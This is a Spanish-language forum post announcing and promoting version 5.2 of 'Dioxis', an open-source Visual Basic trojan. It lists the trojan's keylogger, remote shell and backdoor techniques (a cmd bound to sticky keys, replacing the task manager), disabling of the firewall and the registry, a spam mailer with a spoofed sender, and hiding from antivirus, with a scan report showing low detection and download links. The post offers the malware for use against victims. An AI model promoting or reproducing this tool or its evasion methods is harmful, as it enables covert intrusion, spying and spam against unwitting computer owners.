Tema: [VB 6.0] Dioxis 5.2 La Oveja Negra by 50l3r

Bueno, como muchos estaban impacientes porque sacara la version nueva de dioxis, la 5.2, me he dado un poco de prisa en acabar unas ultimas funciones, lo he preparado todo, aunque se me han quedado cosas, que sacare en la siguiente version de mi juguete

Damos antes que nada la introduccion, dioxis, es un troyano simple, de codigo abierto, libre para todo el mundo, si quieres programarte un troyano puedes empezar desde este teniendo una base claro esta

Informacion de Archivo:
__________________________________
Tamaño Cliente: 2 MB
Archivos: Cliente Dioxis y Libreria COMDLG32.OCX
Lenguaje: Visual Basic 6.0
Conexion: Inversa
Tiempo de Reconexion: Personalizada
Tiempo de Refresco de fin de conexion: 1 segundo
Idioma: Español
Puerto usado: Personalizado,por defecto 3545
Infraestructura: Red Local e internet
__________________________________

Funciones Viejas:

Ejecucion de:

* Paint
* Teclado Universal
* Buscaminas
* Solitario
* Pinball
* Calculadora
* Mensajes personalizados (mejorado)
* Paginas Web (mejorado)


Matanza de Procesos: (MEJORADO)

* Messenger
* Navegadores (Firefox,Iexplorer,Safari, Opera y Google chrome)
* Explorador de Windows
* Proceso Personalizado

Creacion de Puertas Traseras:

* Habilitar terminal server
* Establecer una cmd en sticky keys (compaginado con ts, tienes el control total del pc)
* Establecer una cmd en vez del administrador de tareas (para que no pueda ver las tareas)

Sistema:

* Edicion de la contraseña de administracion a la que se quiera
* Cierre de Sesion
* Apagar Pc

* Keylogger
* Shell Remota
* Creacion de archivos remotamente

Otras:
* Imagen inicial del programa
* Soporte para nick de usuario (Basta de conocer cada host por la ip :P)
* Deteccion de Unidades
* Deteccion de nombre de host remoto y posibilidad de modificarlo para su siguiente reinicio
* Keylogger y chat mejorado ( Antes podrias abrir las veces que quisieras el keylogger lo que daba lugar a errores, y el chat lo mismo)
* Jugar con la victima ( Juego de preguntas y respuestas remotamente)
* Eliminar archivos remotos
* Activar o desactivar el firewall de Windows
* Vulnerar el host remoto a ataques syn flood

Y lo que mas os ayudara en el troyano es su manual que viene integrado con el, el cual te ayuda a averiguar tu ip externa, a crearte un dominio no-ip, y a poder abrir tus malditos puertos del router (si es que tienes)

* Manual de ayuda al usuario(creacion de server y configuracion xD)

__________________________________

Novedades:

__________________________________

• Posibilidad de deshabilitar el registro (especificado en el server make)
  Posibilidad de esconder extensiones y archivos ocultos
  Posibilidad de vincular ejecutables al propio servidor
  
  Mejora de la interfaz notable
  Edicion de fondo y letra de shell
  Chat y preguntas remotas con formulario fijo, el servidor no podra quitar las ventanas, siempre tendran el foco
  Posibilidad de fijar o no el formulario del cliente
  
  Mailer por dos vias(especifico mas abajo)
  solo un proceso por servidor
  Mensajes de alerta al servidor personalizados
  Path de inicio estable para cada winx
  Ofuscacion moderada
  mejora de codigo
  manejo de clipboard
  nuevo sistema de ayuda
  reparacion del sistema de navegacion web remota

__________________________________

Han cambiado bastantes cosas, se han mejorado las anteriores y se han añadido muchas nuevas, lo que ha hecho al servidor un poco mas detectable, no todo iva a ser color de rosas, pero intentare que lo sea, a continuacion los cambios realizados:

__________________________________

Capturas:

__________________________________


Cuento un poco sobre las novedades:

Mailer:

Es lo que por lo menos a mi, mas me ha entusiasmado, podras enviar mails, pero, ¿en realidad quien los manda?

La cosa es que tu no mandas los mails, los manda el servidor, tu unicamente se lo ordenas, el servidor actua como un bot, tienes las opciones para manipular el bot de la siguiente manera:

Cantidad de mensajes: Especificas la cantidad de ese mensaje que quieres mandar, ¿le quieres repetir 3 veces?, adelante
Tiempo entre cada mensaje: Especifica el tiempo que pasara entre que se envie uno y otro mensaje

ATENCION: NO DEBES CERRAR EL FORMULARIO MIENTRAS SE ESTAN MANDANDO REPETIVOS MENSAJES, EL CONTADOR ACTUA EN LA PARTE DEL CLIENTE

Puedes especificar una lista grande, con la opcion de la flecha que doy de agregar emails masivos


Lo mas interesante viene ahora, y es que tienes dos formas de enviar mensajes, una es por un mailer php que he colocado en un hosting y otra es por gmail, las dos tienen sus pros y contras, como por ejemplo, gmail te pide usuario y contraseña de gmail para poder enviar los emails, y no podras falsear la direccion remitente, en webmail si, pero los mails no van cifrados y son mas sospechosos, ademas que la cuenta la pueden cerrar jeje

Mensajes de advertencia:

Es una curiosidad, antes se podian mandar "msg *" pero no tenian vida, ademas de que en win7 al menos en x64, el msg * lo han quitado, por eso he decidido hacer un formulario para crear mensajes personalizados

Ver y Eliminar Procesos:

Ahora podras ver en tiempo real, los procesos que estan ejecutandose en la maquina remota sin tener que hacer un "Taskkill" en la shell, y podras matarlos con un solo click

Mejoras internas:

He organizado un poco el codigo, comentado en cada linea para los que miren el codigo, colocado una interfaz intuitiva, no todo celdas, botones en blanco y negro..etc, dioxis le da la espalda a las aplicaciones que tienen el alma apagada ^^ e intentamos ser modernos

EL chat y juego remoto siempre tendran el foco permanente, asi que lo tendran que ver por la fuerza

__________________________________

Deteccion:

Bueno hasta aqui la explicacion, ahora viene un poco lo que se dice, lo negro de la cosa y es los reportes de av:

File Info

Report date: 2010-03-24 01:55:04 (GMT 1)
File name: server.exe
File size: 147529 bytes
MD5 Hash: 07553291bb1dcc8244846996547cefd4
SHA1 Hash: 44bf93365e54ed2cbe173fa3e74c8f8a1c6991fb
Detection rate: 2 on 21 (10%)
Status: INFECTED

Detections

a-squared - -
Avast - -
AVG - -
Avira AntiVir - TR/Spy.Gen
BitDefender - -
ClamAV - -
Comodo - -
Dr.Web - -
Ewido - -
F-PROT6 - -
G-Data - -
Ikarus T3 - -
Kaspersky - -
McAfee - -
NOD32 - Win32/Genetik
Panda - -
Solo - -
TrendMicro - -
VBA32 - -
VirusBuster - -
Zoner - -

Scan report generated by
NoVirusThanks.org

El servidor es detectado por Avira y nod32, una cosa que he intentado arreglar pero, la cosa es muy rara ya que si elimino codigo para probar donde anda el fallo, me lo detectan 4 avs, luego el avira esta ligado al csocketmaster y no encuentro ninguno que le deje la paranoya en casa al avira

Aun asi, creo que esta bien, para haberle puesto todas estas peligrosas funciones, como que la maquina remota no pueda ver el registro por regedit,que las extensiones no se vean o desasociar los ejecutables que porcierto,e sto no solo l ohace una vez sino que cada 5 segundos comprueba si la clave del registro ha sido cambiada y si lo ha sido la vuelve como estaba, cosa que los avs lo reconocen mucho y que me ha costado indetectarla

__________________________________

Videotutorial

[ame="http://www.youtube.com/watch?v=FhtyUbAj3HA"]YouTube- Demostracion Troyano Dioxis 5.2[/ame]

__________________________________

Link Oficial
Link Secundario